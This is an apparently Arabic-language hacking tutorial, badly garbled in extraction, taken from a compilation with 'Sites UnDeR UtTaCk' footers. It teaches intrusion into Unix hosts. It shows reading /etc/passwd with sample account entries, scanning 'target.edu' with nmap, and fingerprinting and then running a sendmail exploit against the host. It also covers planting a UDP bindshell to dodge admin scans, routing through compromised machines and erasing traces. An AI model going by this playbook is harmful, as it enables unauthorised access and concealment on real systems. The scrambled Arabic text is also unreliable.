ﺘﺨﺪم ؟ !!ﻣﺎ ﺎﻟﺬي ﺳﻮ فﺗﻮاﺟﻬﻪ ﻋﻨﺪ ﺪ ﺧﻮﻟﻚ ﻋﻠﻰﺄي ﻧﻈﺎمﺑﻜﻠﻤﺔ ﺳ ﺮ ﻮاﺳﻢ ﻣﺴ
ﺘﻤﺎﻻ ت :.
ﺘﻘﺎﺑ ﻞ ﺎ ﺣﺪى ﻫﺬه ﺎﻻ ﺣﻋﻨﺪ ﺪ ﺧﻮﻟﻚ ﺎﻟﻰ ﺎﻟﻨﻈﺎم ﺳ
ﺘﺨﺪمﺂ ﺧ ﺮ ..
ﺘﻄﻌ ﺖ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺣﺴﺎب ﻣﺪﯾ ﺮ ﺎﻟﻨﻈﺎم( ﺎﻟ ﺮو ت )ﺄو ﺎﻧﻚ ﺣﺼﻠ ﺖ ﻋﻠﻰ ﺣﺴﺎب ﻣﺴ ﺎﻣﺎ ﺎﻧﻚ ﺎﺳ
ﺘﺎﻟﻲ :. ﺘﺐ ﺎﻻﻣ ﺮ ﺎﻟ ﻓﻲ ﺎﻟﺒﺪاﯾﺔﺗﻜ
pwd $
ﺘﯿﺠﺔﺗﻈﻬ ﺮ :. ﻮاﻟﻨ
usr/admin/ $
ﺘﻌﺎﻣ ﻞ ﻣﻊﻛﺎﻣ ﻞ ﺎﻟﻨﻈﺎمﺑﺪونﻗﯿﻮد ..
ﺘﻄﯿﻊ ﺎﻟ
ﺘﻄﻌ ﺖ ﺎﻟﺪ ﺧﻮ ل ﻋﻠﻰ ﺎﻟﻤﺪﯾ ﺮ ﻮﺑﺬﻟﻚﺗﺴ ﺘﯿﺠﺔ ﺎﻇﻬ ﺮ ت ﺎﻧﻚ ﺎﺳ ﺎﻟﻨ
ﺘﯿﺠﺔ ..ﻓﻤﺜﻼ : ﺘﯿﺠﺔ ﻏﯿ ﺮﺗﻠﻚ ﺎﻟﻨ ﺎذا ﻇﻬ ﺮ ت ﻧ
usr/Black/ $
ﺘﺨﺪم !!ﻓﻬﺬا ﯾﺪ ل ﻋﻠﻰ ﺎﻧﻚ ﺪ ﺧﻠ ﺖ ﻋﻠﻰ ﺣﺴﺎب ﻫﺬا ﺎﻟﻤﺴ
ﺘﺐ ﺎﻵﺗﻲ :. ﺘﺨﺪمﺗﻜ ﻮﻟﻌ ﺮ ض ﻣﻠﻔﺎ ت ﻫﺬا ﺎﻟﻤﺴ
ls /usr/Black $
ﺘﺨﺪم :.ﻮﺳﻮ ف ﯾﻌ ﺮ ضﻟﻚ ﻣﻠﻔﺎ ت ﻫﺬا ﺎﻟﻤﺴ
mail
pers
games
bin
ﻮﻟﻜﻦ ﻫﺬاﻟﻦ ﯾﻌ ﺮ ض ﻣﻠ ﻒ .profile
ﺘﺐ ﺎﻵﺗﻲ :. ﺘﻌ ﺮ ﺿﻪﺗﻜ ﻮﻟﻜﻲﺗﺴ
cd $
ls -a $
:
:
.profile
$
ﺘﺎﻟﻲ :.
ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟ
ﺘﻮﯾﺎ ت ﻣﻠ ﻒﻓﺴﻮ فﺗﻜ ﺎذا ﺎرد تﻗ ﺮا ءة ﻣ ﺤ
cat letter $
ﺘ ﺮ ﺿﻨﺎ ﺎن ﺎﻟﻤﻠ ﻒ ﺎﻟﻤﻄﻠﻮب ﻫﻮ letter ﻮﻫﺬا ﺎذا ﺎﻓ
ﺘﺎﻟﻲ :.
ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟﻟﻠﺒ ﺤﺚ ﻋﻦ ﻣﻌﻠﻮﻣﺔ ﻣﻌﯿﻨﺔﺗﻜ
grep phone Black $
ﺘﺨﺪم ﺎﻵ ﺧ ﺮ
ﻗﺎم ﺎﻟﻬﺎﺗ ﻒ ﺎﻟﺨﺎ ﺻﺔﺑﺎﻟﻤﺴ
ﺘ ﺮا ض ﺎﻧﻚ ﻃﻠﺒ ﺖ ﺎر
ﻮﻫﺬاﺑﺎﻓ
١ ٧٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ :.
ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟ
ﺘﻜﺘﺨﺪمﺂ ﺧ ﺮ ﻋﻠﻰ ﺎﺗﺼﺎ لﻓ
ﺛﺔ ﻣﻊ ﻣﺴ
ﺎذا ﺎرد ت ﻋﻤ ﻞ ﻣ ﺤﺎد
write $
ﺘﺨﺪام
ﺘﻮي ﻋﻠﻰﻛﻠﻤﺎ ت ﺎﻟﺴ ﺮ ﺎﻟﻤﻈﻠﻠﺔ ﯾﺠﺐ ﺎنﺗﻜﻮنﻗﺪ ﺪ ﺧﻠ ﺖ ﻋﻠﻰ ﺎﻟﻨﻈﺎمﺑﺎﺳ ﻮاذا ﺎرد تﻗ ﺮا ءة ﺎﻟﻤﻠ ﻒ ﺎﻟﻤ ﺤ
ﺘﺐ :. ﺘﻌ ﺮا ض ﻣﻠ ﻒﻛﻠﻤﺎ ت ﺎﻟﺴ ﺮ ﻧﻜﺣﺴﺎب ﺎﻟﻤﺪﯾ ﺮ ﻧﻔﺴﻪ ..ﻮﻻﺳ
cat /etc/passwd $
root:F943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
ﺘﺎﻟﻲ :.
ﻗﺪ ﯾﻈﻬ ﺮ ﺣﺴﺎبﺂ ﺧ ﺮﻟﻠﻤﺪﯾ ﺮﻛﺎﻟ
ﻮ
Black:chips11,43:34:3:Mr doooom:/usr/Black:
root::0:root
adm::2:adm,root
bluebox::70:
١ ٨٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$
ـﺮ
ــ
ــﺴ
ـ
ــ
ـاﻟﻜﺎﺗﺐ:أﯾ
$$$$$$$$$$$$
١ ٨١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻮزﯾﻌﺎ ت وانﻛﺎناﻓ ﻀﻠﻬﺎ ﻫﻲ ) SuSeﻟﻢاﺟ ﺮﺑﻬﺎ وﻟﻜﻦاﺳﻤﻊاﻟﻜﺜﯿ ﺮ ﻣﻦ ﻃﺒﻌﺎ ..ﯾﻮﺟﺪ ﻣﻨﻪاﻟﻌﺪﯾﺪ ﻣﻦاﻟ
ﺘﻮزﯾﻌﻪ ( اﻟﻨﺎس ﯾﺸﻜ ﺮونﻓﻲ ﻫﺬهاﻟ
اﻣﺎﺑﺎﻟﻨﺴﺒﻪ ﻻﺳﻬ ﻞﺗﻮزﯾﻪﻓﻬﻲ MDKوﻗﺪ و ﺿﻌ ﺖ ﻫﻨﺎﺑﻌ ﺾاﻟﺪروساﻟﺨﺎﺻﻪﺑﺎﻟﻤﻨﺪرﯾﻚ
ﺘﻬﺎ ..ﯾﻤﻜﻨﻚﺗ ﺤﻤﯿﻠﻬﺎ وﻗ ﺮاﺋ
ﺘﻲ ﻋﻠﻰاﯾﻤﯿﻠﻲ و ﻧ ﺤﺪد ﻣﻜﺎﻧﺎ
انﻟﻢﺗﺠﺪ ﻣﻜﺎﻧﺎﺗ ﺤﺼ ﻞ ﻣﻨﻪ ﻋﻠﻰاﻟﻠﯿﻨﻜ ﺲ ﯾﻤﻜﻨﻚ ﻣ ﺮاﺳﻠ
ﺘﺴﻠﯿﻤﻚ ﻧﺴﺨﻪ ﻣﻦاﻟﻤﺎﻧﺪرﯾﻚ٩اواﻟ ﺮﯾﺪ ﻫﺎ ت) ٧٫٢ﺛﻤﻦاﻻﺳﻄﻮاﻧﺎ تاﻟﺒﻼﻧﻚ واﻟﻨﺴ ﺦﻓﻘﻂ ( ﻟ
ﺘﻘ ﺮ ..ﻣﺠﺎﻧﻲ ..ﯾﻤﻜﻨﻚﺗﻄﻮﯾ ﺮهﻟﯿﻼﺋﻢاﻣﻜﺎﻧﯿﺎ ت ﺟﻬﺎزك
ﻋﻠﻰاي ﺣﺎ ل ..ﻟﻠﯿﻨﻜ ﺲ ﻣﻤﯿﺰا تﻛﺜﯿ ﺮه ..اﻣﻦ ...ﻣﺴ
..
ﺘ ﺮﻧ ﺖ-اﻻﻧ
ﺘ ﺮ ق ﺟﻬﺎزكام ﻣﺎذا ؟؟ﺘ ﺮ ق ..ﺟﻤﯿ ﻞ ﺟﻤﯿ ﻞ ..ﺗ ﺮﯾﺪانﺗﺨ
..ﻣﺎذا ...ﺗ ﺮﯾﺪانﺗﺨ
ﺘ ﺮﻧ ﺖ (:
ﺘ ﺮﻧ ﺖ ...اذن ..دﻋﻨﺎ ﻧﺒ ﺤ ﺮ ﻋﻠﻰاﻻﻧ
ﺘ ﺮ قاﺟﻬﺰه ﻣﺒ ﺤ ﺮهﻓﻲاﻻﻧ
اه..ﺗ ﺮﯾﺪانﺗﺨ
ﺘ ﺮا ق ﺳﯿ ﺮﯾﻔﯿ ﺮ
ﺘﻚ ﻻ ﺧ ﺘﻢاﻻﯾﻘﺎ عﺑﻚ وﻛﺸ ﻒ ﻣ ﺤﺎوﻟ ﺘ ﺮا قﻫﻲانﺗ ﺤﺎو لاﻻ ﯾ اﻫﻢ ﺣﺎﺟﻪﻗﺒ ﻞاﻟﺸ ﺮو عﻓﻲاﻻ ﺧ
ﻣﻌﯿﻦ ..
ﺘﻤﯿﺰهﻓﻲ ﻣﺠﺎ لاﻟ ﺤﻤﺎﯾﻪ و ﻃﺒﻌﺎ ﻫﻨﻚ و ﺳﺎﺋ ﻞ ﻋﺪﯾﺪهﻟﺬﻟﻚﻟﻦاﺗﻄ ﺮ قاﻟﯿﻬﺎ ﻻن ﻫﻨﺎكاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺸ ﺮو حاﻟﻤ
ﺛﺮ
وازاﻟﻪاﻻ
ﺛﻪ :
ﺘﯿﻦاوﺛﻼ اﻟﺨﺼﻬﻢﻓﻲ ﻧﻘﻄ
ﺘﻰﺑﺎﺳﺎﻣﻲ ﻣﺰوره ﻻن ﻫﺬاﻗﺪ ﯾﺠﻌﻠﻚ ﻋ ﺮ ﺿﻪ ﻗﻪ ..و ﻻ ﺣﺘ ﺮا
ﻗﻊﺗ ﺤﺎو لا ﺧ-١اﯾﻚانﺗ ﺤﺎو لانﺗﺴﺠ ﻞﻓﻲ ﻣﻮ
ﻟﻜﺸ ﻒاﻻيﺑﻲاﻟﺨﺎ صﺑﻚ
ﻗﻢ ﻫﺎﺗﻔﻚ و ﺻﺒﺎ حاﻟﻔ ﻞ ...ت و ﻣﻦﺛﻢا ل ispﺛﻢ ر
ﺘﻤﯿﻦﺑﺎﻣﻮراﻟﻬﺎك ... ﻗﺎﺗﻚاﺑﺪااﻣﺎ ﻏﯿ ﺮاﻟﻤﻬ ﺘ ﺮا
ﺘﺒﺎﻫﻰﺑﺎ ﺧ-٢اﯾﺎكانﺗ
ﺘﻨﻲ ﻏﻠﻂ ..ﻣ ﺶﻗﺼﺪي ﯾﻌﻨﻲﺗ ﺮو حﻟﻨ ﺖﻛﺎﻓﯿﻪ ﺘ ﺮ ق داﺋﻢ ﻣﻦ ﺧﻼ ل ﺟﻬﺎزك ...ﻻ ﻻ ..اﻧ ﺖﻓﻬﻤ -٣ا ﺣﺎو لاﻻﺗﺨ
(:
ﺟﻬﺎزك =====<اﻟﺠﻬﺎزاﻟ ﻀ ﺤﯿﻪ ...ده ﻣ ﺶ ﻣﺎﻣﻮن ..ﻟﻜﻦ
ﺟﻬﺎزك======< ﺟﻬﺎز وﺳﯿﻂ======< اﻟﺴﯿ ﺮﻓﯿ ﺮاﻟ ﻀ ﺤﯿﻪ ...دهﻛﺪهﻛﻮﯾ ﺲاوي
ﺘ ﺮ ق ﻣﻦﻗﺒ ﻞاو ﺷﯿ ﻞاﻛﺎوﻧ ﺖ . ﻃﯿﺐاﯾﻪاﻟﺠﻬﺎزاﻟﻮﺳﯿﻂ ده ..ده ﻣﻤﻜﻦ ﯾﻜﻮن ﻣﺜﻼ ﺟﻬﺎز ﻣﺨ
١ ٨٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘ ﺤﻜﻢﻓﻲ ﺟﻬﺎز ﻣﻦﺑﻌﯿﺪ و ﻫﺬا ﻃﯿﺐ ﻣﺎﻫﻮاﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖ:ﻫﻮ ﻋﺒﺎره ﻋﻦ ﺧﺪﻣﻪ ﺣﯿﺚ ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼﻟﻬﺎاﻟ
اﻟﺠﻬﺎز ﻋﻠﯿﻪ ﻧﻈﺎماﻟﯿﻮﻧﯿﻜ ﺲ
ﺘ ﺮا قﻫﺬااﻟﺠﻬﺎز ..و ﯾﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻤﻦ ﯾﻘﺪﻣﻮن ﻫﺬااﻟ ﺤﺪﻣﻪ ﻣﺠﺎﻧﺎ .. ﻃﺒﻌﺎ ﻣﻦ ﻏﯿ ﺮانﺗﻘﻮمﺑﺎ ﺧ
ﺘ ﺮ قاﺟﻬﺰه ﺧﻄﯿ ﺮه و ﻣﻬﻤﻪ ﻣﺜ ﻞ gov .mil.او ﺳﯿ ﺮﻓﯿ ﺮا تاﺟﺐ ﻋﻠﯿﻚﻗﺒ ﻞان edu.و -٤ﺣﺎو لان ﻻﺗﺨ
ﻏﯿ ﺮﻫﺎ ﻣﻦ ﻫﺬااﻟﻨﻤﻂ.
ﻗﻢﺗﻠﯿﻔﻮﻧﻚ ﻋﻦ ﻣﺰوداﻟﺨﺪﻣﻪﻟﺪﯾﻚ . ﺘﻤﺪ ﻋﻠﻰﺑﻌ ﺾﺗﻘﻨﯿﺎ تاﻟﻔ ﺮﯾﻜﯿﻨ ﺞ ..ﻟﻌﻤ ﻞا ﺧﻔﺎ ءﻟ ﺮ -٥ﻫﺬهاﻟﻨﻘﻄﻪﺗﻌ
REdirecting
ﺘﺼﻔﺢ ﻣﺜﻼ www.host.netﻣﺎاﻟﺬي ﯾ ﺤﺪ ث ؟؟ ﻣﺜﺎ ل :ﻟﻮ ﺳﯿﺎدﺗﻚﻗﻤ ﺖﺑﺰﯾﺎره ﻫﺬااﻟﻌﻨﻮان ﻣﻦ ﺧﻼ لاﻟﻤ
ﻗﻢ ٨٠ ﻗﻊ ﻣﻦ ﺧﻼ لﺑﻮر تا ل TCPر ﺘﺼﻔﺢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ ﯾﻘﻮماﻟﻤ
ﺛﻢ ﯾﻘﻮمﺑﺎرﺳﺎ لاﻻﻣ ﺮ
GET /HTTP/1.1 /index.htmlواواﻣ ﺮا ﺧ ﺮىﻛﺜﯿ ﺮه ..
ﺘﻤ ﻞاﻟﺨﺎ صﺑﺎﻟﺼﻔ ﺤﻪ index.html ﻗﻊاﻟﻤﻄﻠﻮبﺑﺎرﺳﺎ لﻛﻮداﻟﻬ ﺛﻢﺑﻌﺪ ذاﻟﻚ ﯾﻘﻮماﻟﻤﻮ
ﺘﺎﺟﯿﻨﻪ
اﻟﺸﻲ ءاﻟﻄ ﺮﯾ ﻒانا ل daemonsدي ﻣﻠﯿﺌﻪﺑﺎﻟﺜﻐ ﺮا تاﻻﻣﻨﯿﻪاﻟﺨﻄﯿ ﺮه ...وﻫﻮه دهاﻟﻠﻲا ﺣﻨﺎ ﻣ ﺤ
=<
١ ٨٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻬﺪ ف ...اذنﻛﯿ ﻒﺗ ﺤﺼ ﻞ ﻋﻰاﻟﻤﻌﻠﻮﻣﺎ ت ﻫﺬه .. ﺘﻮ ﺣﻪﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮاﻟﻤﺴ ﻣﺎﻫﻲاﻟﻤﻨﺎﻓﺬاﻟﻤﻔ
ﺘﻬﺪ ف
ﺘﺼ ﻞﺑﺎﻟﺴﯿ ﺮﻓﯿ ﺮاﻟﻤﺴ ﻣﻦ ﺧﻼ ل ﻣﺎا ل... port scanersاﻟﺴﻜﺎﻧ ﺮز ﻫﻲ ﻋﺒﺎره ﻋﻦﺑ ﺮاﻣ ﺞﺗ ﺤﻮ لانﺗ
ﺘﻮ ﺣﻪ
ﻣﻦ ﺧﻼ ل ﺟﻤﯿﻊاﻟﻤﻨﺎﻓﺬ ..و ذﻟﻚﻟﻤﻌ ﺮﻓﻪاياﻟﺒﻮرﺗﺎ تاﻟﻤﻔ
ﻓﻲ ﻫﺬااﻟﺴﯿ ﺮﻓﯿ ﺮ ...اﺷﻬ ﺮ ﻫﺬااﻟﺴﻜﺎﻧ ﺮز ﻫﻲاﻻداه nmapﺑﻮاﺳﻄﻪ fyodorوﻟ ﺤﺴﻦاﻟ ﺤﻆ ﯾﻮﺟﺪ ﻧﺴﺨﻪ
ﻣﻨﻬﺎ ﺧﺎ ﺻﻪﺑﺎﻟﻮﯾﻨﺪوز و !!..اﯾﻪ ده ..؟؟
ا ﺣﻨﺎ ﻣ ﺶاﺗﻔﻘﻨﺎ ﻧﻨﺴﻰاﻟﻮﯾﻨﺪوز ده ﺧﺎﻟ ﺺ =>
/http://members.lycos.co.uk/linuxdude/e3sar
ﻃﯿﺐ..ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﻨﻜ ﺲ ﯾﻤﻜﻨﻨﺎان ﻧ ﺤﺼ ﻞ ﻋﻠﻰ ﻧﺴﺨﻪ nmapﻋﻠﻰﻫﯿﺌﻪ rpm
ﺘﺎﻟﻲ :
ﺘ ﺮﻛﯿﺒﻬﺎاﺗﺒﻊاﻟ
وﻟ
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
ﻗﻊ
ﻗﻊ target.eduﻛﻤﺜﺎ لﻟﻤﻮ
ﺘﺨﺪماﻟﻤﻮ
ﺘﺸﻐﯿ ﻞ ..وان ﺷﺎ ءا ﷲ ﺳﻨ ﺤﺎو ل ﻋﻠﻰ ﻣﺪاراﻟﺪرسﺑﺎﺳ ﺛﻢ ﻧﻘﻮمﺑﺎﻟ
ﺘﻬﺪ ف ..ﻣﺴ
ﺘﺎﻟﻲ :اﺗﺒﻊاﻟ
bash-2.03$ nmap -sS target.edu
ﺘﻮ ﺣﻪﻛﻢﺗ ﺮى!! ﻗﻊ وﻗﺎمﺑﻤﻌ ﺮﻓﻪاﻟﻤﻨﺎﻓﺬاﻟﻤﻔ اذنﻟﻘﺪﻗﺎما ل nmapﺑﻌﻤ ﻞﻓ ﺤ ﺺ ﺷﺎﻣ ﻞ ﻋﻠﻰاﻟﻤﻮ
ﻗﻊ target.edu اذن ﯾﻤﻜﻨﻨﺎان ﻧﻌ ﺮ فاﯾ ﻀﺎاياﻟﺨﺪﻣﺎ ت وا ل daemonsاﻟﻤﻮﺟﻮدهﻓﻲاﻟﻤﻮ
ﻗﻊ ﻣﻦا ﺣﺪ ﻫﺬااﻟﻤﻨﺎﻓﺬ ..ﻓﻜ ﺮ ﻣﻌﻲ ﻣﺎﻫﻲ ﻫﺬهاﻻداه؟؟؟ﻟﻜﻦ ﯾﻠﺰﻣﻨﺎاداه ﻣﻌﯿﻨﻪﻟﻼﺗﺼﺎ لﺑﺎﻟﻤﻮ
ﺘﻠﻨ ﺖ دﯾﻤﻮن ..وﻟﻜﻨﻪاﯾ ﻀﺎ ﻋﺒﺎره ﻋﻦ ﺘﻠﻨ ﺖ ﻫﻮه ﺧﺪﻣﻪ ..ﻣﻦ ﺧﻼ لاﻟ
ﺘﻠﻨ ﺖ ..اه ..ﺻ ﺤﯿﺢاناﻟ
ﻧﻌﻢاﻧﻬﺎاﻟ
ﻗﻊ ﺑﻤﻨﻔﺬ ﻣﻌﯿﻦ ﻣﻦ ﺧﻼ لا ل ... TCPﺗﻌﺎ ل ﻧﺸﻮ ف ﻣﺜﺎ ل : ﺑ ﺮﻧﺎﻣ ﺞﺑﺴﯿﻂ ..ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼﻟﻪاﻻﺗﺼﺎ لﺑﺎي ﻣﻮ
١ ٨٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
اﻫﺎاااا
(: دو ل دﻟﻮﻧﺎ ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﻪاوياوي
SunOS 5.6 ﺘﺸﻐﯿ ﻞ ﻫﻨﺎك ﻫﻮ ﻧﻈﺎماﻟ-١
sunOS اﻟﻠﻲﺑﯿﯿﺠﻲ ﻣﻊ ﻧﻈﻢاﻟﺴﻦstandard دﯾﻤﻮناﻻ فﺗﻲﺑﻲ ﻫﻨﺎك ﻫﻮا ل-٢
: ﺘﻠﻨ ﺖ
ﺘﺼ ﻞﺑﯿﻪ ﻣﻦاﻟ
ﺗﻌﺎ ل ﻧﺠ ﺮبﺑﻮر تﺗﺎﻧﻲ ﻧ
/٨٫١١٫٠ وانا ﺻﺪاره ﻫﻮsendmail ﻫﻮا لsmtp ﺘﻔﺪﻧﺎ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﻪ ﻫﻲان دﯾﻤﻮن اﯾ ﻀﺎاﺳ
٨٫٩٫٣
ﺘﻤﺪ ﻋﻠﻰ
ﺘ ﺞاﻟﻰ ﻫﺬااﻟﻤﻌﻠﻮﻣﺎ ت ؟؟ ﻻناﻻﻛﺴﺒﻠﻮﯾ ﺖ واﻟﺜﻐ ﺮهاﻟﻤﻮﺟﻮده داﺋﻤﺎﺗﻌ ﻃﯿﺐﻟﻤﺎذا ﻧ ﺤ.. ﺟﻤﯿ ﻞ ﺣﻤﯿ ﻞ
ﻟﻜﻦﺗﻮﺟﺪ ﻣﺸﻜﻠﻪ وﻫﻲانﺑﻌ ﺾاﻟﻤﻜﻌﻠﻮﻣﺎ تﻗﺪ ﯾﻤﻜﻦان.. ﺘﺸﻐﯿ ﻞ اﻟﻤﻮﺟﻮد و ﻋﻠﻰ ﻧﻈﺎماﻟdaemon ا ل
ﺗﻜﻮن ﻣﺰورهاو ﻏﯿ ﺮ ﺻ ﺤﯿ ﺤﻪ
: ازاي ؟؟؟ﺗﺎﺑﻊ ﻣﻌﺎﯾﺎﻛﺪه
nmap ﺑﺎﻻداه
bash-2.03$ nmap -sS target.edu
١ ٨٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
|: ﯾﺎﻧﻬﺎراﺳﻮد
!!!!!! ﺘﺨﻤﯿﻨﻪ ﻫﻮﻟﯿﻨﻜ ﺲ
ﺘﺸﻐﯿ ﻞاﻟﻠﻲاﻻدهﻗﺎﻣ ﺖﺑﻧﻈﺎماﻟ
@= !!!!!!اه ﯾﺎ و ﻻداﻟﻜﻠﺐsunOS ﻣ ﺶﻛﺎن
ﻟﻜﻦ ﻧﻘﺪر ﻧﻘﻮ لاناﻟﻤﻌﻠﻮﻣﺎ تاﻟﻠﻲ ﺟﻤﻌﻨﺎﻫﺎﻛﻔﺎﯾﻪ و.. ﺑ ﺲا ﺣﻨﺎﺑ ﺮده ﻻزم ﻧﻌ ﺮ فﺗﻮزﯾﻌﻪاﻟﻠﯿﻨﻜ ﺲاﻟﻮﺟﻮده
ﻣﻤﻜﻦﺗﻤﺸﻲ
ﻗﻌﻪﻗﻊ وﻟﻜﻦ ﻣﻤﻜﻦا ﺣﺪاﻻدﻣﯿﻨﺰﻟﻮ ﻋ ﺮ فاناﻧﻨﺎﻗﻤﻨﺎﺑﻔ ﺤ ﺺ ﻣﻮ ﻛﺪها ﺣﻨﺎﻗﻤﻦﺑﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﻤﻮ.. ﻃﯿﺐ
ﺘﻘﺪ ﻧﻪ ﺣﯿﻜﻮن زﻋﻼن ﻣﻨﻦ و ﺣﻨﺎ ﻣ ﺶ ﻋﺎﯾﺰﯾﻦاﻻدﻣﯿﻦ ﯾﺰﻋ ﻞ ﻣﻨﻨﺎﻟﺬﻟﻚ اﻋ...
D= ﺘﺒ ﺮ ﻋﻤ ﻞ ﺷ ﺮﻋﻲ ﻻ ﻣﺸﺎﻛ ﻞﻓﯿﻪﻗﻊ ﯾﻌ ﻋﻠﻰاي ﺣ ﻞﻓﺎن ﻋﻤ ﻞ ﺳﻜﺎنﻟﻤﻮSs- ﺘﯿﺎر ﺘﺨﺪﻣﻨﺎاﻻ ﺧ اﺳ
:ﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت راﺟﻊ
bash-2.03$ man nmap
١ ٨٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻣﻠ ﺤﻮﻇﻪ :ﻋﯿﺐاوياﻧﻚﺗﺎ ﺧﺪاﻻﻣ ﺮﯾﻦ دو لﻛﻘﺎﻋﺪه ﻣﺴﻠﻢﺑﯿﻬﺎ..ﻛ ﻞاﻛﺴﺒﻠﻮد وﻟﻪاواﻣ ﺮهاﻟﺨﺎ ﺻﻪﻓﻲ
ﺘﺸﻐﯿ ﻞاﻟﻜﻮﻣﺒﺎﯾ ﻞ وﻟﻪ ﻃ ﺮﯾﻘﻪﻓﻲاﻟ
ﺘﻌﻠﯿ ﻖاﻟﺒ ﺮﻣﺠﻲاوﻓﻲا ل. usage ﺗﻈﻬ ﺮﻫﺬااﻟﻄ ﺮﯾﻘﻪﻓﻲاﻟ
ﺘﻌﻠﯿﻘﺎ تاذا
ﺘﺎﻋﻬﺎاواﻟ
ﺘﻠﻔﻪ ﻋﻦاﻻ ﺧ ﺮى و ﯾﺠﺐ ﻋﻠﯿﻚانﺗﻘ ﺮااﻟﻜﻮدﺑ ..ﻃﯿﺐ زي ﻣﺎﻗﻠ ﺖانﻛ ﻞاﻛﺴﺒﻠﻮﯾ ﺖ ﻣﺨ
ﻛﻨ ﺖ ﻻﺗﻔﻬﻢﻓﻲﻟﻐﻪاﻟﺒ ﺮﻣﺠﻪ ..
ﺘﺎ تﻫﻲاﻟﺒﻔ ﺮاوﻓ ﺮﻓﻠﻮ ...ﯾﻘﻮم ﻫﺬهاﻻﻛﺴﺒﻠﻮﯾ ﺖﺑﻌﻤ ﻞ ) درﺑﻜﻪﻓﻲاﻟﺪﯾﻤﻮن ( ﻣﻦاﺳﻬ ﻞ واﺷﻬ ﺮاﻻﻛﺴﺒﻠﻮﯾ
ﻣﻢ ﯾﺆدياﻟﻰﺗﺸﻐﯿ ﻞاﻟﻜﻮداﻟﺬيﺗ ﺮﯾﺪه
١ ٨٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$./exploit 25 target.edu
١ ٨٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٨٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
sh-2.03$ cd /dev
sh-2.03$ chown root nul
١ ٩٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-٣ﻛﯿ ﻒﺗ ﻀﻊ bindshell؟
ﺘﻠﻨ ﺖ دﯾﻤﻮن ﻋﺒﺎره ﻋﻦﺑﺎﯾﻨﺪ ﺷﯿ ﻞ
bindshellﻋﺒﺎره ﻋﻦ دﯾﻤﻮن ﺷﺒﯿﻪ ﺟﺪﺑﺎ ل telnetdﻓﻲاﻟ ﺤﻘﯿﻘﻪاﻟ
..
ﺘﺢﺑﻮر تاو ﻣﻨﻔﺬ ﯾﻌﻨﻲ وﻟﻜﻨﻪﻟﯿ ﺲ ﻣﻨﻔﺬ TCPﺑ ﻞ ﻣﻨﻔﺬ UDP اﻟﺒﺎﯾﻨﺪ ﺷﯿ ﻞ ﻫﺬا ﯾﻘﻮمﺑﻔ
و ﻃﺒﻌﺎﺑﯿﻌﻄﯿﻚ ﺷﯿ ﻞ ﻋﻨﺪاﻻﺗﺼﺎ لﺑﻬﺬااﻟﺒﻮر ت ..
ﺘﺎﻣﯿﻦ ﻋﺎده وﻓﻲ
ﺘﺎﻋﻪﻟﻠ
اﻟﻄ ﺮﯾ ﻒ واﻟﺸﯿ ﻖﻓﻲاﻟﻤﻮ ﺿﻮ عاﻧﻪاﻻدﻣﯿﻦﻟﻤﺎ ﯾﯿﺠﻲ ﯾﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﺠﻬﺎزﺑ
اﻏﻠﺐاﻻ ﺣﯿﺎناﻟﺴﻜﻦ ﯾﻜﻮن
ﻋﻠﻰ ﻣﻨﺎﻓﺬا ل TCPو ﻧﺎدرا ﺟﺪاان ﯾﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰ ﻣﻨﺎﻓﺬﺑ ﺮوﺗﻮﻛﻮ ل UDP
ﺛﺎر -:
-ﻋﻤﻠﯿﻪازاﻟﻪاﻻ
ﻓﻲ ﻧﻈﺎاماﻟﯿﻮﻧﯿﻜ ﺲ ..ﻋﻨﺪﻣﺎﺗﻘﻮمﺑﺎﻟﺪ ﺧﻮ لاﻟﻰ ﺣﺴﺎﺑﻚ ..ﻓﻨﻜﺎﺗ ﺮى رﺳﺎﻟﻪ ﻋﻨﺪاو لاﻟﺪ ﺧﻮ لﺗﻌﻠﻤﻚﺑﺎ ﺧ ﺮ ﻣ ﺮه
